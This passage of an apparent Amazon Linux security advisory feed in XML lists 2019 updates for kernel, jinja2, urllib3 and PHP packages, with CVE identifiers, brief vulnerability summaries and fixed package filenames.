version="4.91" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.91-1.20.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.91" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.91-1.20.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.91" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.91-1.20.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.91" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.91-1.20.amzn1.i686.rpm</filename></package><package name="exim" version="4.91" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.91-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1222</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1222: critical priority package update for kernel</title><issued date="2019-06-13 21:37:00" /><updated date="2019-06-17 17:58:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11479:
CVE-2019-11478:
CVE-2019-11477:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11477" title="" id="CVE-2019-11477" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11478" title="" id="CVE-2019-11478" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11479" title="" id="CVE-2019-11479" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.123" release="86.109.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.123-86.109.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.123-86.109.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.123-86.109.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1223</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1223: important priority package update for python-jinja2</title><issued date="2019-06-11 22:37:00" /><updated date="2019-06-13 18:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-10745:
In Pallets Jinja before 2.8.1, str.format allows a sandbox escape.
1698345:
CVE-2016-10745 python-jinja2: Sandbox escape due to information disclosure via str.format
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10745" title="" id="CVE-2016-10745" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-jinja2" version="2.7.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-jinja2-2.7.2-3.16.amzn1.noarch.rpm</filename></package><package name="python27-jinja2" version="2.7.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-jinja2-2.7.2-3.16.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1224</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1224: low priority package update for python-urllib3</title><issued date="2019-06-11 22:41:00" /><updated date="2019-06-13 18:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-20060:
urllib3 before version 1.23 does not remove the Authorization HTTP header when following a cross-origin redirect (i.e., a redirect that differs in host, port, or scheme). This can allow for credentials in the Authorization header to be exposed to unintended hosts or transmitted in cleartext.
1649153:
CVE-2018-20060 python-urllib3: Cross-host redirect does not remove Authorization header allow for credential exposure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20060" title="" id="CVE-2018-20060" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-urllib3" version="1.24.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-urllib3-1.24.1-1.6.amzn1.noarch.rpm</filename></package><package name="python26-urllib3" version="1.24.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-urllib3-1.24.1-1.6.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1225</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1225: low priority package update for php71 php72 php73</title><issued date="2019-06-11 23:00:00" /><updated date="2019-06-13 18:37:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11036:
When processing certain files, PHP EXIF extension in versions 7.1.x below 7.1.29, 7.2.x below 7.2.18 and 7.3.x below 7.3.5 can be caused to read past allocated buffer in exif_process_IFD_TAG function. This may lead to information disclosure or crash.
1707299:
CVE-2019-11036 php: buffer over-read in exif_process_IFD_TAG function leading to information disclosure
CVE-2019-11035:
When processing certain files, PHP EXIF extension in versions 7.1.x below 7.1.28, 7.2.x below 7.2.17 and 7.3.x below 7.3.4 can be caused to read past allocated buffer in exif_iif_add_value function. This may lead to information disclosure or crash.
1702246:
CVE-2019-11035 php: heap buffer overflow in function exif_iif_add_value
CVE-2019-11034:
When processing certain files, PHP EXIF extension in versions 7.1.x below 7.1.28, 7.2.x below 7.2.17 and 7.3.x below 7.3.4 can be caused to read past allocated buffer in exif_process_IFD_TAG function. This may lead to information disclosure or crash.
1702256:
CVE-2019-11034 php: heap buffer overflow in function xif_process_IFD_TAG
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11034" title="" id="CVE-2019-11034" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11035" title="" id="CVE-2019-11035" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11036" title="" id="CVE-2019-11036" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-embedded" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.29" release="1.39.amzn1" epoch="0" 